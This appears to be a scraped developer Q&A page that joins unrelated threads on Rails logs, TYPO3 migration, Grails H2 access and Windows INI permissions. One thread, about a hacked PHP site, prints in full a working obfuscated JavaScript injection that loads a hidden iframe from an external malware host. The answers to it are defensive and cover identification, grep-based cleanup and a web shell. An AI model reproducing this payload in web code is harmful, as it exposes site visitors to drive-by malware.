Develop Reference

How to display log for Rails application?

I have a rails app and I would like to display the log in the app itself. This will allow administrators to see what changes were recently made without entering the console and using the file with the logs. All logs will be displayed in the application administration. How is it possible to implement and what kind of gems do I need to use?

You don't need a Gem.
Add a controller, read the logfiles and render the output in HTML.
Probably need to limit the number of lines you read. Also there might be different log files to chose from.
I don't think this is a good idea though. Log files are for finding errors and you should not need them in your day to day work, unless you manage ther server.
Also they might contain sensitive data (CC Numbers, Pwds, ...) and it might get complicated when you use multiple servers with local disks.
Probably better to look at dedicated tools for this and handle logs outside of your application.

Assuming that you have git associated with your application or git bash installed in your system.
For displaying log information for the development mode, migrate to your application folder in your console/terminal and type tail -f log/development.log

typo3 website move to other domain - need help step by step

I just got a typo3 website and need to transfer to an other domain.
Is it enough to copy all the folders (except typo3temp?) to the new place?
First I just changed baseurl in ts but it didn't do anything..
Should I do anything with the database when it still on the same server?

In case your question is about "cloning" a complete TYPO3-system an rsync/copy of the whole folder (yes including typo3temp) is the best idea, as this works on all versions, everything else (like excluding typo3temp) depends a whole lot on your TYPO3 expertise to resolve. The database needs to be copied as well. If you need to change db-name or db-credentials on the new system you need to change them in
typo3conf/LocalConfiguration.php
As soon as you have done this Install Tool and Backend should work: At first try the Install Tool:
https://my.new.domain/typo3/install/
If that doesn't work your problem is with the webserver configuration or dns.
If that works (and the reports there show no errors), try the Backend:
https://my.new.domain/typo3/
In case your question is about which changes are necessary to your TYPO3-installation if domain changes and the web server itself is configured correctly, then there are probably two things you need to change, in order to make the frontend work (although both cases might be omitted, depending on your configuration):
sys_template record, if any of those use absRefPrefix or baseurl. If you have access to the MySQL-Database a
SELECT pid FROM sys_template WHERE config LIKE "%baseurl%" OR "%absRefPrefix";
might help finding the template, however these template configuration might also be stored in files (typically in fileadmin/templates/**)
sys_domain records, a MySQL
SELECT pid FROM sys_domain;
might uncover where those are stored
However these changes are only necessary to enable the frontend to work.

Add a domain record in the backend. And while you don't need the content of the typo3temp folder, make sure the folder actually exists.

When you go to the new domain name in your browser, what happens?
Do you get redirected to the old domain? If so, maybe there is an .htaccess redirect happening.
Do you get to the new domain, but if you click on a link end up on the old one?
Do you get an error? If so, what is the error?
Does something else happen?

Found This Hack in my web server php files

How did i get them and what can i do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#

It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.

Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data.
If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded.
If you have no CMS, change your FTP & control panel passwords.
As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it.
To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.

this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux).
I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do.
Many of my files were infected with something like:
<?php
#8f4d8e#
...
#/8f4d8e#
?>
I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system.
If you have SSH access to the server go to your document root and search for all files containing the string:
grep -R "#8f4d8e#" .
You could also look for your version of the god.php file... look for traces of R57, for example by issuing:
grep -R "R57" .
Mine had a big ASCII art drawing of a bug at the beginning of the file.
I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company).
What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.

connecting to a grails app database

I am a python developer by day, but I have some java experience as well (mostly with struts). At work I was handed a grails app to install, which was ok, but the owners of the app didn't supply any credentials, and the app loads to a login page.
I unpacked the war, but I think the DB config has been packaged into a jar somewhere, because I can't seem to find any connection URL. There's an h2 db file that's been created after I deployed the App, so I'm wondering:
how can I connect to the db like you normally would with SQLite or mysql client, browse tables, and create an admin user so I can login?

Go with decompilation. You need not only a user and password, but at least a database JDBC URL. That may include DBMS name, host, port, database name - depending on Java driver specifics. Then connect as you would normally in Python or whatever, or with DBVisualizer.
But if the database is in H2/hsql (URL is like jdbc:h2:mem:XXX), you've got a problem: it is a Java in-process DBMS. In order to gain external access to it, you'll need to change the decompiled code, compile and pack it back with some additions. Hope it's not your case.
Another way in hsql/H2 case is to find and decompile database bootstrap code - as it's an in-process DB, it should be filled at every application startup, so there should be a code creating that superuser.

In Grails, the DB configuration, including authentication settings, are declared in a file called Datasource.groovy which is then compiled into the WAR. You'll need the source code to find the username and password for the H2 DB.

I don't know if Python can connect to a java datasource but it may be a solution.
An other solution may be to provide some REST webservice from Grails side to make it possible for the python program to access the database. This is the way I prefer and I often choose.
By the way, you have the configuration of the databases used by Grails in the conf directory (grails-app/conf/DataSource.groovy) and you'll get the jdbc URL to the database which could be convert to a classical URL. For example : jdbc:mysql://localhost/my_app refers to the database my_app on localhost and default port for a mysql database.
Feel free to ask if you need more information.
Cheers

Setting User Access Rights in Windows

Can someone tell me how to set file permissions in Delphi 2006? I am using TINIFile.Create to create INI files in my application. The problem is that if I create the file while logged onto Windows as an administrator and then try to run the application as just a standard user and overwrite the INI file, I do not have permission to do so. I put the file in the AllUsers\ApplicationData\MyProduct folder. I'd like to set the permissions to this folder. I need AllUsers to have Full permissions to the MyProduct folder. If its possible to do this through a WindowsAPI that'd be great because I also need to do this in C++ and C#. I'd really appreciate any help. Thanks!

Although you can do all sorts of permission changes with the right code in Delphi (as admin) a better application structure is to NOT assume that your App has any privileges (you say you want it to run in user mode). Instead, use the installer that will install your App (e.g Inno Setup) to copy a suitable Ini file template into your required data folder. You can specify the permissions that you want using "Permissions: user-modify" on the file copy line.

You can use JEDI library for this. Here is a blog "Setting file security with JWSCL" from posted by Christian Wimmer

The correct answer on "how to do that" is "don't do it at all".
If you set "allow to write for anyone" for your MyProduct folder or ini-file - this will be violating security. Because now any user can affect other users - this is not what they should be allowed to do.
Any user must affect only his world. He should not affect worlds of other users. This power is reserved for administrators.
Why is this bad? Obsiosly.
That's why the correct way will be approx. like this:
Installer of your application MAY put an ini-file into AllUsers folder, but DO NOT alter file's permissions. This file will be default read-only options.
Your application should read settings from AllUsers folder and from current user folder. If it needs to save settings - it should write to user folder, not AllUsers. That way, each user will have their own preferences/settings.
If you want that "someone powerfull" should have ability to enforce settings for all users - he should be an administrator. He can edit file in AllUsers, thus affecting settings of all users.
Note, that you also need to decide, which setting have higher priority (global or local). So, you can have both at same time: (a) local settings for each user and (b) ability to enforce/override user's settings.

Most probably you create your ini file into the application folder, don't you? You should avoid such practice. Instead create ini files into users\YourUser\AppData\Roaming\YourProduct.

I am having a similar problem.
Since you need to do this also in other environments I have a suggestion for you.
Use an external installer to install your application. It has many benefits and one of them is that it will configure for you a File\Directory\Registry permissions during the installation. Of course you would have to run the installation on administrative account but then your users will have the permissions required by your application.
I can recommend you a great installer which is called Inno Setup.